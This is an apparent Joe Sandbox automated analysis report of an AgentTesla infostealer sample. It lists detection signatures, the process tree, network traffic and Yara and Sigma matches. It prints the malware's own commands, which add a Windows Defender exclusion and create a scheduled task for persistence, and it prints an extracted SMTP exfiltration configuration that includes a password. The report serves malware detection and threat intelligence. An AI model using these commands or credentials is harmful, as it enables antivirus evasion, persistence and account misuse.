Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jKqPSehspS.exe

Overview

General Information

Sample name:jKqPSehspS.exe
renamed because original name is a hash value
Original sample name:23a0eed35d69811a38633d41868a1fd6a20faf3912bde628eb556124fd6e5447.exe
Analysis ID:1588702
MD5:3b1b99f3617bbe21d2bd1601e6ce73ee
SHA1:0ba6e0fe3c8f5a0511694421d841c377c1a4dae5
SHA256:23a0eed35d69811a38633d41868a1fd6a20faf3912bde628eb556124fd6e5447
Tags:AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • jKqPSehspS.exe (PID: 1308 cmdline: "C:\Users\user\Desktop\jKqPSehspS.exe" MD5: 3B1B99F3617BBE21D2BD1601E6CE73EE)
    • powershell.exe (PID: 6352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6860 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3956 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jKqPSehspS.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\jKqPSehspS.exe" MD5: 3B1B99F3617BBE21D2BD1601E6CE73EE)
  • BLpvFR.exe (PID: 2660 cmdline: C:\Users\user\AppData\Roaming\BLpvFR.exe MD5: 3B1B99F3617BBE21D2BD1601E6CE73EE)
    • schtasks.exe (PID: 7344 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BLpvFR.exe (PID: 7408 cmdline: "C:\Users\user\AppData\Roaming\BLpvFR.exe" MD5: 3B1B99F3617BBE21D2BD1601E6CE73EE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "mail@iaa-airferight.com", "Password": "Asaprocky11"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.3946194292.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.jKqPSehspS.exe.4259970.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.jKqPSehspS.exe.4259970.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.jKqPSehspS.exe.4259970.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x316f7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x31769:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x317f3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x31885:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x318ef:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x31961:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x319f7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x31a87:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                9.2.jKqPSehspS.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  9.2.jKqPSehspS.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 12 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\jKqPSehspS.exe", ParentImage: C:\Users\user\Desktop\jKqPSehspS.exe, ParentProcessId: 1308, ParentProcessName: jKqPSehspS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", ProcessId: 6352, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\jKqPSehspS.exe", ParentImage: C:\Users\user\Desktop\jKqPSehspS.exe, ParentProcessId: 1308, ParentProcessName: jKqPSehspS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", ProcessId: 6352, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\BLpvFR.exe, ParentImage: C:\Users\user\AppData\Roaming\BLpvFR.exe, ParentProcessId: 2660, ParentProcessName: BLpvFR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp", ProcessId: 7344, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 46.175.148.58, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\Desktop\jKqPSehspS.exe, Initiated: true, ProcessId: 6784, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\jKqPSehspS.exe", ParentImage: C:\Users\user\Desktop\jKqPSehspS.exe, ParentProcessId: 1308, ParentProcessName: jKqPSehspS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp", ProcessId: 3956, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\jKqPSehspS.exe", ParentImage: C:\Users\user\Desktop\jKqPSehspS.exe, ParentProcessId: 1308, ParentProcessName: jKqPSehspS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe", ProcessId: 6352, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\jKqPSehspS.exe", ParentImage: C:\Users\user\Desktop\jKqPSehspS.exe, ParentProcessId: 1308, ParentProcessName: jKqPSehspS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp", ProcessId: 3956, ProcessName: schtasks.exe

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "25", "Host": "mail.iaa-airferight.com", "Username": "mail@iaa-airferight.com", "Password": "Asaprocky11"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeReversingLabs: Detection: 91%
                    Multi AV Scanner detection for submitted file
                    Source: jKqPSehspS.exeVirustotal: Detection: 79%Perma Link
                    Source: jKqPSehspS.exeReversingLabs: Detection: 91%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: jKqPSehspS.exeJoe Sandbox ML: detected
                    Source: jKqPSehspS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49711 version: TLS 1.2
                    Source: jKqPSehspS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4259970.1.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.8:59576 -> 162.159.36.2:53
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 46.175.148.58 46.175.148.58
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.8:49708 -> 46.175.148.58:25
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: mail.iaa-airferight.com
                    Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                    Source: jKqPSehspS.exe, BLpvFR.exe.0.drString found in binary or memory: http://localhost/arkanoid_server/requests.php
                    Source: jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.iaa-airferight.com
                    Source: jKqPSehspS.exe, 00000000.00000002.1534303990.0000000003286000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000A.00000002.1573785874.0000000002756000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: jKqPSehspS.exe, 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: jKqPSehspS.exe, 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49711 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\jKqPSehspS.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BLpvFR.exe
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.jKqPSehspS.exe.4259970.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.jKqPSehspS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.jKqPSehspS.exe.4294390.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.jKqPSehspS.exe.4259970.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 0_2_0150DF140_2_0150DF14
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 0_2_079447300_2_07944730
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 0_2_079442F80_2_079442F8
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 0_2_07945F700_2_07945F70
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 0_2_07943EC00_2_07943EC0
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 0_2_0794BD080_2_0794BD08
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 0_2_07945B380_2_07945B38
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_0126A9689_2_0126A968
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_01264A989_2_01264A98
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_01263E809_2_01263E80
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_012641C89_2_012641C8
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_0126F8A59_2_0126F8A5
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_06AE45A09_2_06AE45A0
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_06AE5D309_2_06AE5D30
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_06AE35789_2_06AE3578
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_06AE03389_2_06AE0338
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_06AEE0B99_2_06AEE0B9
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_06AE91F09_2_06AE91F0
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_06AEA1409_2_06AEA140
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_06AE56509_2_06AE5650
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_06AE3CA09_2_06AE3CA0
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeCode function: 9_2_06AEC3589_2_06AEC358
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_00D0DF1410_2_00D0DF14
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_0595114010_2_05951140
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_0595113010_2_05951130
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_06FF3EC010_2_06FF3EC0
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_06FF5F7010_2_06FF5F70
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_06FF473010_2_06FF4730
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_06FF42F810_2_06FF42F8
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_06FFABA810_2_06FFABA8
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 10_2_06FF5B3810_2_06FF5B38
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_0128A18214_2_0128A182
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_0128A96814_2_0128A968
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_0128DBE014_2_0128DBE0
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_01284A9814_2_01284A98
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_01283E8014_2_01283E80
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_012841C814_2_012841C8
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_0128E4D014_2_0128E4D0
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_068945A014_2_068945A0
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_06895D3014_2_06895D30
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_0689357814_2_06893578
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_0689E0B914_2_0689E0B9
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_0689103014_2_06891030
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_068991E014_2_068991E0
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_0689A14014_2_0689A140
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_0689565014_2_06895650
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_06893C8F14_2_06893C8F
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_0689032814_2_06890328
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeCode function: 14_2_0689C35814_2_0689C358
                    Source: jKqPSehspS.exe, 00000000.00000002.1520573879.000000000134E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs jKqPSehspS.exe
                    Source: jKqPSehspS.exe, 00000000.00000002.1534303990.000000000329C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs jKqPSehspS.exe
                    Source: jKqPSehspS.exe, 00000000.00000002.1520573879.00000000013D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShe vs jKqPSehspS.exe
                    Source: jKqPSehspS.exe, 00000000.00000002.1534303990.0000000003286000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8854fa4e-ee03-4899-b0c3-2df80b3f7614.exe4 vs jKqPSehspS.exe
                    Source: jKqPSehspS.exe, 00000000.00000000.1475642417.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamejNDn.exe0 vs jKqPSehspS.exe
                    Source: jKqPSehspS.exe, 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename8854fa4e-ee03-4899-b0c3-2df80b3f7614.exe4 vs jKqPSehspS.exe
                    Source: jKqPSehspS.exe, 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs jKqPSehspS.exe
